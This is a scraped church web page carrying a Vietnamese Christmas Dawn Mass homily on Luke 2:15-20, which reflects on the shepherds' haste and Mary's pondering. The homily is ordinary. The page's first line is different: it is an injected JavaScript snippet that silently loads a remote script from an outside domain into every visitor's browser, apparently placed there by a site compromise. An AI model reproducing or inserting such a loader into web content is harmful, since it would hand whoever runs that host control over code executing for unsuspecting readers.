;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); TÌM GẶP CHÚA HÀI NHI – Xitô PS

TÌM GẶP CHÚA HÀI NHI

SUY NIỆM LỄ GIÁNG SINH- LỄ RẠNG ĐÔNG 

LC 2, 15-20

Bối cảnh dân Do Thái đang bị lưu đày bên Babylon trong cảnh ngộ khốn khổ dai dẳng hầu như vô vọng thì ngôn sứ Isaia báo cho họ biết “Đấng Cứu Độ” sẽ đến giải thoát họ khỏi cảnh lưu đày, làm cho họ trở thành một “dân thánh” là những người được Thiên Chúa cứu chuộc và thành Giêrusalem của họ sẽ được gọi là “cô gái đắt chồng” là thành không bị bỏ rơi. Và trong bối cảnh lịch sử đó người cứu tinh là Kyrô, vua nước Batư. Nhưng trong lịch sử cứu độ phổ quát, Đấng Cứu Độ chính là Ngôi Hai Thiên Chúa xuống thế làm người danh hiệu là Giêsu.

Với bài Tin Mừng của thánh sử Luca hôm nay tường thuật về biến cố Chúa Giáng Sinh có nhiều điều đáng chúng ta suy niệm: “Sau khi các thiên sứ rời những người chăn chiên để về trời, những người này bảo nhau: Nào ta sáng Bêlem để xem sự việc đã xảy ra như Chúa đã tỏ cho ta biết. Họ liền hối hả ra đi” (Lc 2, 15-16).

Những người đầu tiên được thiên sứ loan báo Tin Mừng Giáng sinh là các mục đồng, mặc dù họ nghèo nàn bé mọn không có cơ hội để thường xuyên đến Hội đường hoặc Đền thờ để tham dự các nghi lễ phụng tự tôn thờ ca tụng Đức Chúa, mặc dù họ bị xã hội coi thường, khinh bỉ, nhưng chính họ là những con người chất phát, đơn sơ, thành tâm thiện chí, cho nên đáng được nhận sứ điệp Tin Mừng trọng đại cũng là tin vui cho toàn dân!

  • Thành tâm thiện chí của họ thể hiện trong cách họ đáp lại với Tin Mừng Giáng Sinh: Sau khi được nghe thiên sứ loan báo họ đã hối hả lên đường đi tới Bê Lem để gặp gỡ Chúa Hài Nhi và sau khi gặp được và thờ lạy Chúa Hài Nhi Giêsu, họ trở về loan truyền những việc kỳ diệu, tai nghe mắt thấy, cho mọi người gặp gỡ.
  • Phần Đức Maria thì ghi nhờ tất cả mọi sự và suy đi nghĩ lại trong lòng để ngày càng hiểu thêm về Hài Nhi Giêsu và kế hoạch cứu độ kỳ diệu của Thiên Chúa.
  • Lại nữa, với bài Tin Mừng Thánh lễ sáng nay, Thánh Luca như muốn nhắn nhủ mọi người chúng ta về tâm tình và thái độ phải có trước mầu nhiệm Chúa Giáng Sinh là: Mau mắn tin vào việc Chúa làm, và ngạc nhiên chúc tụng tung hô Chúa Hài Nhi như các mục đồng đã làm quả thật là tốt đẹp! Đặc biệt trong mùa Giáng Sinh này chúng ta cùng nhau ca hát chúc tụng Chúa Hài Đồng như các người chăn chiên xưa hân hoan tôn vinh chúc tụng Thiên Chúa, vang hòa với các thiên sứ…Nhưng tất cả sẽ mau qua và hời hợt, nếu chúng ta không noi gương bắt chước tâm tình và thái độ của Đức Maria suy đi nghĩ lại trong lòng. Tâm tình và thái độ của Đức Maria mới thật là tâm tình và thái độ của người đã tin, của người đã nhận ra kế hoạch cứu độ của Thiên Chúa! Kế hoạch mới khởi sự và chưa tỏ hiện hết, nên đòi hỏi người có lòng tin phải suy niệm trong lòng, và như vậy, việc lên đường của chúng ta hôm nay không phải để đi đến Bê lem hay máng cỏ, nhưng là để đi vào trong thâm cung của lòng mình, để thấy được ân huệ Chúa Giáng Sinh đang làm gì cho chúng ta. Có thế lời ngôn sứ Isaia mới thấm thía! Chúng ta không còn là thành đô bị bỏ rơi, nhưng đã được tìm kiếm và được cứu chuộc và trở nên thánh thiện.

Xưa kia, chúng ta còn xa lạ và thù địch với Chúa, trái tim mỗi người như thiếu tình yêu hay quá lộn xộn vì dục vọng đam mê. Nay Chúa Cứu Chuộc đến với chúng ta, để ta không còn bị bỏ rơi trong cảnh tội lỗi lầm than. Và như thánh Phao lô nói: “Người đến để rửa sạch tội lỗi và tuôn đổ đầy tràn Thánh Thần của Người trên chúng ta nhờ Đức Giêsu Kitô, Đấng cứu độ chúng ta. Như vậy, một khi nên công chính nhờ ân sủng của Đức Kitô, chúng ta được thừa hưởng sự sống đời đời như chúng ta vẫn hy vọng” (x Tt 3. 4-7).

Nhận ra được ân huệ Giáng Sinh như thế, hẳn chúng ta không những vui hưởng niềm vui tự nhiên của Mùa Giáng Sinh, mà còn phải có tâm tình và thái độ trầm lắng như Đức Mẹ Maria hằng suy ngằm mầu nhiệm Emmanuel-Thiên Chúa ở cùng chúng ta.

 

LM PHÊRÔ KHOA-LÊ TRỌNG NGỌC

You May Also Like

Trả lời

X